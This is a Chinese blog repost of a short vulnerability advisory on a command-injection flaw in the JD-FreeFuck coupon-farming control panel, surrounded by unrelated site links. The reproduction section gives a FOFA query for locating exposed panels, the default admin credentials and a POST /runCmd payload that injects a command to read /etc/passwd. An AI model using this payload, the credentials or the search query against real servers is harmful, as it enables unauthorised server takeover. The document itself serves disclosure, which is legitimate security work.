当前位置:网站首页>JD-FreeFuck 京東薅羊毛控制面板 後臺命令執行漏洞
JD-FreeFuck 京東薅羊毛控制面板 後臺命令執行漏洞
2022-04-23 18:05:00 【孤桜懶契】
漏洞描述
i
JD-FreeFuck 存在後臺命令執行漏洞,由於傳參執行命令時沒有對內容過濾,導致可以執行任意命令,控制服務器 項目地址: https://github.com/meselson/JD-FreeFuck
漏洞影響
s
JD-FreeFuck
空間測繪
d
FOFA:title="京東薅羊毛控制面板"
漏洞複現
- 訪問後登錄頁面如下

- 默認賬號
useradmin/supermanito
POST /runCmd HTTP/1.1
cmd=bash+jd.sh+%3Bcat /etc/passwd%3B+now&delay=500

個人博客
孤桜懶契:https://gylq.gitee.io/time
版权声明
本文为[孤桜懶契]所创,转载请带上原文链接,感谢
https://yzsam.com/2022/04/202204231804351608.html
边栏推荐
- 2022江西储能技术展会,中国电池展,动力电池展,燃料电池展
- 20222 return to the workplace
- Reptile efficiency improvement method
- Calculation of fishing net road density
- Identification verification code
- 深度学习经典网络解析目标检测篇(一):R-CNN
- C#字节数组(byte[])和字符串相互转换
- Rust: a simple example of TCP server and client
- Queue solving Joseph problem
- An example of linear regression based on tensorflow
猜你喜欢
![[UDS unified diagnostic service] v. diagnostic application example: Flash bootloader](/img/45/f9e24ae1c619f78aeeb7bcf12d6e5f.png)
[UDS unified diagnostic service] v. diagnostic application example: Flash bootloader

MySQL_01_简单数据检索

Data stream encryption and decryption of C

7-21 wrong questions involve knowledge points.

Dock installation redis

Re regular expression

.105Location

Implementation of image recognition code based on VGg convolutional neural network

Fashion classification case based on keras

Go的Gin框架学习
随机推荐
[UDS unified diagnostic service] IV. typical diagnostic service (4) - online programming function unit (0x34-0x38)
C# 网络相关操作
2022 Jiangxi energy storage technology exhibition, China Battery exhibition, power battery exhibition and fuel cell Exhibition
Cells in rust share variable pointers
C1 notes [task training part 2]
Rust: shared variable in thread pool
Stanford machine learning course summary
Calculation of fishing net road density
The difference between deep copy and shallow copy
Tensorflow tensor introduction
A few lines of code teach you to crawl lol skin pictures
MySQL_01_简单数据检索
Qt读写XML文件(含源码+注释)
Using files to save data (C language)
Install pyshp Library
C [file operation] read TXT text by line
.104History
C language loop structure program
Notes on common basic usage of eigen Library
Cloud native Virtualization: building edge computing instances based on kubevirt